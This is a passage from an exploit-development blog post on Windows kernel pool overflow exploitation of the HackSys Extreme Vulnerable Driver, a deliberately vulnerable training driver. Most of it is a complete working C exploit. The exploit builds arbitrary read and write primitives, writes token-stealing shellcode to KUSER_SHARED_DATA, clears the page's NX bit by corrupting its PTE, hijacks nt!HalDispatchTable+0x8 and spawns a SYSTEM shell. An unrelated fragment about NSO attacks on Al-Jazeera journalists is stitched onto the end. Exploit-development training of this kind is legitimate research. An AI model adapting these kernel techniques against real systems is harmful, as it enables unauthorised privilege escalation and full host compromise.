  1. nt!MiGetPteAddress+0x13 - this contains the base of the PTEs needed for calculations
  2. PTE bits that make up the shellcode page
  3. [nt!HalDispatchTable+0x8] - used to execute our shellcode. We first need to preserve this address by reading it to ensure exploit stability

Let’s add a routine to address the first issue, reading the base of the page table entries. We can calculate the offset to the function MiGetPteAddress+0x13 and then use our arbitrary read primitive.

Leveraging the exact same method as before, we can see we have defeated page table randomization and have the base of the page table entries in hand!

The next step is to obtain the PTE bits that make up the shellcode page. We will eventually write our shellcode to KUSER_SHARED_DATA+0x800 in kernel mode, which is at a static address of 0xfffff78000000800. We can instrument the routine to obtain this information in C.
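Here is a sketch of that calculation in C (it mirrors the math used later in the exploit; pteBase is the value we just leaked from nt!MiGetPteAddress+0x13):

// Compute the virtual address of the PTE that maps KUSER_SHARED_DATA+0x800
unsigned long long kusersharedData = 0xfffff78000000800;

unsigned long long shellcodePte = kusersharedData >> 9;   // drop the page-offset bits, scale the index by 8
shellcodePte &= 0x7FFFFFFFF8;                              // mask down to the self-map index range
shellcodePte += pteBase;                                   // relocate against the leaked PTE base

// shellcodePte can now be handed to the arbitrary read primitive to leak the PTE contents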

After running the updated exploit, we can see that we are able to leak the PTE bits for KUSER_SHARED_DATA+0x800, where our shellcode will eventually reside.

Note that the !pte extension in WinDbg was giving myself trouble. So, from the debuggee machine, I ran WinDbg “classic” with local kernel debugging (lkd) to show the contents of !pte. Notice the actual virtual address for the PTE has changed, but the contents of the PTE bits are the same. This is due to myself rebooting the machine and kASLR kicking in. The WinDbg “classic” screenshot is meant to just outline the PTE contents.

You can view this previous blog post of mine to understand the permissions KUSER_SHARED_DATA has, which are write but not execute. The last item we need is the contents of [nt!HalDispatchTable+0x8].

After executing the updated code, we can see we have preserved the value [nt!HalDispatchTable+0x8].

The last item on the agenda is the write primitive, which is 99 percent identical to the read primitive. After writing our shellcode to kernel mode and then corrupting the PTE of the shellcode page, we will be able to successfully escalate our privileges.

Arbitrary Write Primitive

Leveraging the same concepts from the arbitrary read primitive, we can also arbitrarily overwrite 64-bit pointers! This time, instead of using the "Get" operation to fetch the dereferenced contents of the Name value held by the "corrupted" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object and return them via the Name value of the "main" object, we will set the Name value of the "main" object not to a pointer that receives the contents, but to the value we would like to write to memory. In this case, we want to set this value to our shellcode, and then set the Name value of the "corrupted" object to KUSER_SHARED_DATA+0x800, incrementing it as we go.
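As a hypothetical helper (again, the wrapper name and the corruptedObject/mainObject globals are mine; both calls use the "set" IOCTL, mirroring the final listing):

// Sketch of the arbitrary write primitive.
// Step 1: "set" on the corrupted object points the main object's Name at 'where'.
// Step 2: "set" on the main object dereferences 'where' and writes 'what' there.
void arbitraryWrite64(HANDLE driverHandle, unsigned long long where, unsigned long long what)
{
    DWORD bytesReturned = 0;

    corruptedObject.Name = &where;
    DeviceIoControl(driverHandle, 0x00222067, &corruptedObject, sizeof(corruptedObject),
                    NULL, 0, &bytesReturned, NULL);

    mainObject.Name = &what;
    DeviceIoControl(driverHandle, 0x00222067, &mainObject, sizeof(mainObject),
                    NULL, 0, &bytesReturned, NULL);
}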

From here we can run our updated exploit. Since we have created a loop to automate the writing process, we can see we are able to arbitrarily write the contents of the 9 QWORDS which make up our shellcode to KUSER_SHARED_DATA+0x800!

Awesome! We have now successfully performed the arbitrary write primitive! The next goal is to corrupt the contents of the PTE for the KUSER_SHARED_DATA+0x800 page.

From here we can use WinDbg classic to inspect the PTE before and after the write operation.

Awesome! Our exploit now just needs three more things:

  1. Corrupt [nt!HalDispatchTable+0x8] to point to KUSER_SHARED_DATA+0x800
  2. Invoke ntdll!NtQueryIntervalProfile, which will perform the transition to kernel mode to invoke [nt!HalDispatchTable+0x8], thus executing our shellcode
  3. Restore [nt!HalDispatchTable+0x8] with the arbitrary write primitive

Let’s update our exploit code to perform step one.

After executing the updated code, we can see that we have successfully overwritten nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 - which contains our shellcode!

Next, we can add the routine to dynamically resolve ntdll!NtQueryIntervalProfile, invoke it, and then restore [nt!HalDispatchTable+0x8].
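In sketch form (matching the typedef and call used in the final listing):

// Resolve and invoke ntdll!NtQueryIntervalProfile; the kernel path taken by this call dispatches
// through [nt!HalDispatchTable+0x8], which now points at our shellcode in KUSER_SHARED_DATA+0x800
NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
    GetModuleHandle(TEXT("ntdll.dll")),
    "NtQueryIntervalProfile"
);

ULONG interval = 0;
NtQueryIntervalProfile(0x1234, &interval);   // same profile-source value used in the final listing

// Once the token has been stolen, restore [nt!HalDispatchTable+0x8] with the preserved value
// using the arbitrary write primitive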

The final result is a SYSTEM shell from low integrity!

“…Unless We Conquer, As Conquer We Must, As Conquer We Shall.”

Hopefully you, as the reader, found this two-part series on pool corruption useful! As mentioned at the beginning of this post, we must expect mitigations such as VBS and HVCI to be enabled in the future. ROP is still a viable alternative in the kernel due to the lack of kernel CET (kCET) at the moment (although I am sure this is subject to change). As such, techniques such as the one outlined in this blog post will soon be deprecated, leaving us with fewer options for exploitation than we started with. Data-only attacks are always viable, and there have been more novel techniques mentioned, such as this tweet sent to myself by Dmytro, which talks about leveraging ROP to forge kernel function calls even with VBS/HVCI enabled. As the title of this last section of the blog articulates, where there is a will there is a way - and although the bar will be raised, this is only par for the course with exploit development over the past few years. KPP + VBS + HVCI + kCFG/kXFG + SMEP + DEP + kASLR + kCET and many other mitigations will prove very useful for blocking most exploits. I hope that researchers stay hungry and continue to push the limits of these mitigations to find more novel ways to keep exploit development alive!

Peace, love, and positivity :-).

Here is the final exploit code, which is also available on my GitHub:

// HackSysExtreme Vulnerable Driver: Pool Overflow + Memory Disclosure
// Author: Connor McGarr (@33y0re)

#include <windows.h>
#include <stdio.h>

// typedef an ARW_HELPER_OBJECT_IO struct
typedef struct _ARW_HELPER_OBJECT_IO
{
    PVOID HelperObjectAddress;
    PVOID Name;
    SIZE_T Length;
} ARW_HELPER_OBJECT_IO, * PARW_HELPER_OBJECT_IO;

// Create a global array of ARW_HELPER_OBJECT_IO objects to manage the groomed pool allocations
ARW_HELPER_OBJECT_IO helperobjectArray[5000] = { 0 };

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Leak the base of HEVD.sys
unsigned long long memLeak(HANDLE driverHandle)
{
    // Array to manage handles opened by CreateEventA
    HANDLE eventObjects[5000];

    // Spray 5000 objects to fill the new page
    for (int i = 0; i < 5000; i++)
    {
        // Create the objects
        HANDLE tempHandle = CreateEventA(
            NULL,
            FALSE,
            FALSE,
            NULL
        );

        // Assign the handles to the array
        eventObjects[i] = tempHandle;
    }

    // Check to see if the first handle is a valid handle
    if (eventObjects[0] == NULL)
    {
        printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());

        return 0x1;
        exit(-1);
    }
    else
    {
        printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

        // Close half of the handles
        for (int i = 0; i < 5000; i += 2)
        {
            BOOL tempHandle1 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle1)
            {
                printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        printf("[+] Poked holes in the new pool page!\n");

        // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
        // kLFH should automatically fill the freed holes with the UAF objects
        DWORD bytesReturned;

        for (int i = 0; i < 2500; i++)
        {
            DeviceIoControl(
                driverHandle,
                0x00222053,
                NULL,
                0,
                NULL,
                0,
                &bytesReturned,
                NULL
            );
        }

        printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

        // Close the rest of the event objects
        for (int i = 1; i <= 5000; i += 2)
        {
            BOOL tempHandle2 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle2)
            {
                printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        // Array to store the buffer (output buffer for DeviceIoControl) and the base address
        unsigned long long outputBuffer[100];
        unsigned long long hevdBase = 0;

        // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
        // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

        for (int i = 0; i <= 100; i++)
        {
            // Return buffer
            DWORD bytesReturned1;

            DeviceIoControl(
                driverHandle,
                0x0022204f,
                NULL,
                0,
                &outputBuffer,
                sizeof(outputBuffer),
                &bytesReturned1,
                NULL
            );

        }

        printf("[+] Successfully triggered the out-of-bounds read!\n");

        // Parse the output
        for (int i = 0; i < 100; i++)
        {
            // Kernel mode address?
            if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
            {
                printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
                printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

                // Store the variable for future usage
                hevdBase = outputBuffer[i] - 0x880CC;

                // Return the value of the base of HEVD
                return hevdBase;
            }
        }
    }
}

// Function used to fill the holes in pool pages
void fillHoles(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedFill;

    for (int i = 0; i < 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject.Name = &nameValue;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject;
    }

    printf("[+] Sprayed ARW_HELPER_OBJECT_IO objects to fill holes in the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Fill up the new page within the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects
void groomPool(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject1 = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue1 = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject1.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedGroom;

    for (int i = 0; i < 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject1.Name = &nameValue1;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject1;
    }

    printf("[+] Filled the new page with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Free every other object in the global array to poke holes for the vulnerable objects
void pokeHoles(HANDLE driverHandle)
{
    // Bytes returned
    DWORD bytesreturnedPoke;

    // Free every other element in the global array managing objects in the new page from grooming
    for (int i = 0; i < 5000; i += 2)
    {
        DeviceIoControl(
            driverHandle,
            0x0022206f,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedPoke,
            NULL
        );
    }

    printf("[+] Poked holes in the NonPagedPoolNx page containing the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Create the main ARW_HELPER_OBJECT_IO
ARW_HELPER_OBJECT_IO createmainObject(HANDLE driverHandle)
{
    // Instantiate an object of type ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO helperObject = { 0 };

    // Set the Length member which corresponds to the amount of memory used to allocate a chunk to store the Name member eventually
    helperObject.Length = 0x8;

    // Bytes returned
    DWORD bytesReturned2;

    // Invoke CreateArbitraryReadWriteHelperObjectNonPagedPoolNx to create the main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
    DeviceIoControl(
        driverHandle,
        0x00222063,
        &helperObject,
        sizeof(helperObject),
        &helperObject,
        sizeof(helperObject),
        &bytesReturned2,
        NULL
    );

    // Parse the output
    printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperObject.HelperObjectAddress);
    printf("[+] PARW_HELPER_OBJECT_IO->Name: 0x%p\n", helperObject.Name);
    printf("[+] PARW_HELPER_OBJECT_IO->Length: 0x%zu\n", helperObject.Length);

    return helperObject;
}

// Read/write primitive
void readwritePrimitive(HANDLE driverHandle)
{
    // Store the value of the base of HEVD
    unsigned long long hevdBase = memLeak(driverHandle);

    // Store the main ARW_HELOPER_OBJECT
    ARW_HELPER_OBJECT_IO mainObject = createmainObject(driverHandle);

    // Fill the holes
    fillHoles(driverHandle);

    // Groom the pool
    groomPool(driverHandle);

    // Poke holes
    pokeHoles(driverHandle);

    // Use buffer overflow to take "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name value (managed by ARW_HELPER_OBJECT_IO.Name) to overwrite any of the groomed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name values
    // Create a buffer that first fills up the vulnerable chunk of 0x10 (16) bytes
    unsigned long long vulnBuffer[5];
    vulnBuffer[0] = 0x4141414141414141;
    vulnBuffer[1] = 0x4141414141414141;

    // Hardcode the _POOL_HEADER value for a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object
    vulnBuffer[2] = 0x6b63614802020000;

    // Padding
    vulnBuffer[3] = 0x4141414141414141;

    // Overwrite any of the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name member with the address of the "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX (via ARW_HELPER_OBJECT_IO.HelperObjectAddress)
    vulnBuffer[4] = (unsigned long long)mainObject.HelperObjectAddress;

    // Bytes returned
    DWORD bytesreturnedOverflow;
    DWORD bytesreturnedreadPrimtitve;

    printf("[+] Triggering the out-of-bounds-write via pool overflow!\n");

    // Trigger the pool overflow
    DeviceIoControl(
        driverHandle,
        0x0022204b,
        &vulnBuffer,
        sizeof(vulnBuffer),
        &vulnBuffer,
        0x28,
        &bytesreturnedOverflow,
        NULL
    );

    // Find which "groomed" object was overflowed
    int index = 0;
    unsigned long long placeholder = 0x9090909090909090;

    // Loop through every groomed object to find out which Name member was overwritten with the main ARW_HELPER_NON_PAGED_POOL_NX object
    for (int i = 0; i < 5000; i++)
    {
        // The placeholder variable will be overwritten. Get operation will overwrite this variable with the real contents of each object's Name member
        helperobjectArray[i].Name = &placeholder;

        DeviceIoControl(
            driverHandle,
            0x0022206b,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Loop until a Name value other than the original NOPs is found
        if (placeholder != 0x9090909090909090)
        {
            printf("[+] Found the overflowed object overwritten with main ARW_HELPER_NON_PAGED_POOL_NX object!\n");
            printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperobjectArray[i].HelperObjectAddress);

            // Assign the index
            index = i;

            printf("[+] Array index of global array managing groomed objects: %d\n", index);

            // Break the loop
            break;
        }
    }

    // IAT entry from HEVD.sys which points to nt!ExAllocatePoolWithTag
    unsigned long long ntiatLeak = hevdBase + 0x2038;

    // Print update
    printf("[+] Target HEVD.sys address with pointer to ntoskrnl.exe: 0x%llx\n", ntiatLeak);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &ntiatLeak;

    // Set the Name member of the "corrupted" object managed by the global array. The main object is currently set to the Name member of one of the sprayed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX that was corrupted via the pool overflow
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare variable that will receive the address of nt!ExAllocatePoolWithTag and initialize it
    unsigned long long ntPointer = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the ntPointer variable. When the Name member is dereferenced and bubbled back up to user mode, it will overwrite the value of ntPointer
    mainObject.Name = &ntPointer;

    // Perform the "Get" operation on the main object, which should now have the Name member set to the IAT entry from HEVD
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print the pointer to nt!ExAllocatePoolWithTag
    printf("[+] Leaked ntoskrnl.exe pointer! nt!ExAllocatePoolWithTag: 0x%llx\n", ntPointer);

    // Assign a variable the base of the kernel (static offset)
    unsigned long long kernelBase = ntPointer - 0x9b3160;

    // Print the base of the kernel
    printf("[+] ntoskrnl.exe base address: 0x%llx\n", kernelBase);

    // Assign a variable with nt!MiGetPteAddress+0x13
    unsigned long long migetpteAddress = kernelBase + 0x222073;

    // Print update
    printf("[+] nt!MiGetPteAddress+0x13: 0x%llx\n", migetpteAddress);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &migetpteAddress;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the base of the PTEs
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the base of the PTEs
    unsigned long long pteBase = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the pteBase variable
    mainObject.Name = &pteBase;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Base of the page table entries: 0x%llx\n", pteBase);

    // Calculate the PTE page for our shellcode in KUSER_SHARED_DATA
    unsigned long long shellcodePte = 0xfffff78000000800 >> 9;
    shellcodePte = shellcodePte & 0x7FFFFFFFF8;
    shellcodePte = shellcodePte + pteBase;

    // Print update
    printf("[+] KUSER_SHARED_DATA+0x800 PTE page: 0x%llx\n", shellcodePte);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &shellcodePte;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the address of the shellcode PTE page
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the PTE bits
    unsigned long long pteBits = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &pteBits;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] PTE bits for shellcode page: %p\n", pteBits);

    // Store nt!HalDispatchTable+0x8
    unsigned long long halTemp = kernelBase + 0xc00a68;

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &halTemp;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the pointer at nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive [nt!HalDispatchTable+0x8]
    unsigned long long halDispatch = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &halDispatch;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Preserved [nt!HalDispatchTable+0x8] value: 0x%llx\n", halDispatch);

    // Arbitrary write primitive

    /*
        ; Windows 10 19H1 x64 Token Stealing Payload
        ; Author Connor McGarr
        [BITS 64]
        _start:
            mov rax, [gs:0x188]       ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]     ; Current process (_EPROCESS)
            mov rbx, rax              ; Copy current process (_EPROCESS) to rbx
        __loop:
            mov rbx, [rbx + 0x448]    ; ActiveProcessLinks
            sub rbx, 0x448            ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x440]    ; UniqueProcessId (PID)
            cmp rcx, 4                ; Compare PID to SYSTEM PID
            jnz __loop                ; Loop until SYSTEM PID is found
            mov rcx, [rbx + 0x4b8]    ; SYSTEM token is @ offset _EPROCESS + 0x4b8
            and cl, 0xf0              ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x4b8], rcx    ; Copy SYSTEM token to current process
            xor rax, rax              ; set NTSTATUS STATUS_SUCCESS
            ret                       ; Done!
    */

    // Shellcode
    unsigned long long shellcode[9] = { 0 };
    shellcode[0] = 0x00018825048B4865;
    shellcode[1] = 0x000000B8808B4800;
    shellcode[2] = 0x04489B8B48C38948;
    shellcode[3] = 0x000448EB81480000;
    shellcode[4] = 0x000004408B8B4800;
    shellcode[5] = 0x8B48E57504F98348;
    shellcode[6] = 0xF0E180000004B88B;
    shellcode[7] = 0x48000004B8888948;
    shellcode[8] = 0x0000000000C3C031;

    // Assign the target address to write to the corrupted object
    unsigned long long kusersharedData = 0xfffff78000000800;

    // Create a "counter" for writing the array of shellcode
    int counter = 0;

    // For loop to write the shellcode
    for (int i = 0; i < 9; i++)
    {
        // Setting the corrupted object to KUSER_SHARED_DATA+0x800 incrementally 9 times, since our shellcode is 9 QWORDS
        // kusersharedData variable, managing the current address of KUSER_SHARED_DATA+0x800, is incremented by 0x8 at the end of each iteration of the loop
        helperobjectArray[index].Name = &kusersharedData;

        // Setting the Name member of the main object to specify what we would like to write
        mainObject.Name = &shellcode[counter];

        // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800, incrementally
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &helperobjectArray[index],
            sizeof(helperobjectArray[index]),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Perform the arbitrary write via "set" to overwrite each QWORD of KUSER_SHARED_DATA+0x800 until our shellcode is written
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &mainObject,
            sizeof(mainObject),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Increase the counter
        counter++;

        // Advance to the next QWORD of KUSER_SHARED_DATA+0x800
        kusersharedData += 0x8;
    }

    // Print update
    printf("[+] Successfully wrote the shellcode to KUSER_SHARED_DATA+0x800!\n");

    // Taint the PTE contents to corrupt the NX bit in KUSER_SHARED_DATA+0x800
    unsigned long long taintedBits = pteBits & 0x0FFFFFFFFFFFFFFF;

    // Print update
    printf("[+] Tainted PTE contents: %p\n", taintedBits);

    // Leverage the arbitrary write primitive to corrupt the PTE contents

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &shellcodePte;

    // Specify what we would like to write (the tainted PTE contents)
    mainObject.Name = &taintedBits;

    // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800's PTE virtual address
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted the PTE of KUSER_SHARED_DATA+0x800! This region should now be marked as RWX!\n");

    // Leverage the arbitrary write primitive to overwrite nt!HalDispatchTable+0x8

    // Reset kusersharedData
    kusersharedData = 0xfffff78000000800;

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of KUSER_SHARED_DATA+0x800)
    mainObject.Name = &kusersharedData;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted [nt!HalDispatchTable+0x8]!\n");

    // Locating nt!NtQueryIntervalProfile
    NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
        GetModuleHandle(
            TEXT("ntdll.dll")),
        "NtQueryIntervalProfile"
    );

    // Error handling
    if (!NtQueryIntervalProfile)
    {
        printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
        exit(1);
    }

    // Print update for found ntdll!NtQueryIntervalProfile
    printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

    // Calling nt!NtQueryIntervalProfile
    ULONG exploit = 0;
    NtQueryIntervalProfile(
        0x1234,
        &exploit
    );

    // Print update
    printf("[+] Successfully executed the shellcode!\n");

    // Leverage arbitrary write for restoration purposes

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of the preserved value at [nt!HalDispatchTable+0x8])
    mainObject.Name = &halDispatch;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully restored [nt!HalDispatchTable+0x8]!\n");

    // Print update for NT AUTHORITY\SYSTEM shell
    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

    // Spawning an NT AUTHORITY\SYSTEM shell
    system("cmd.exe /c cmd.exe /K cd C:\\");
}

void main(void)
{
    // Open a handle to the driver
    printf("[+] Obtaining handle to HEVD.sys...\n");

    HANDLE drvHandle = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0x0,
        NULL,
        OPEN_EXISTING,
        0x0,
        NULL
    );

    // Error handling
    if (drvHandle == (HANDLE)-1)
    {
        printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
        exit(-1);
    }
    else
    {
        readwritePrimitive(drvHandle);
    }
}

Threat Actors are Working Together. Defenders Should Collaborate Too!

17 July 2021 at 20:14
Threat Actors are Working Together. Defenders Should Collaborate Too!

We previously published that we suspected that there were more than one threat actor targeting the Al-Jazeera journalists.

Background

ZecOps discovered NSO attacks that targeted Al-Jazeera automatically using ZecOps Mobile EDR & DFIR solutions. Our initial analysis suggested that the footprint does not belong only to NSO.

ZecOps Mobile Threat Intelligence Brief

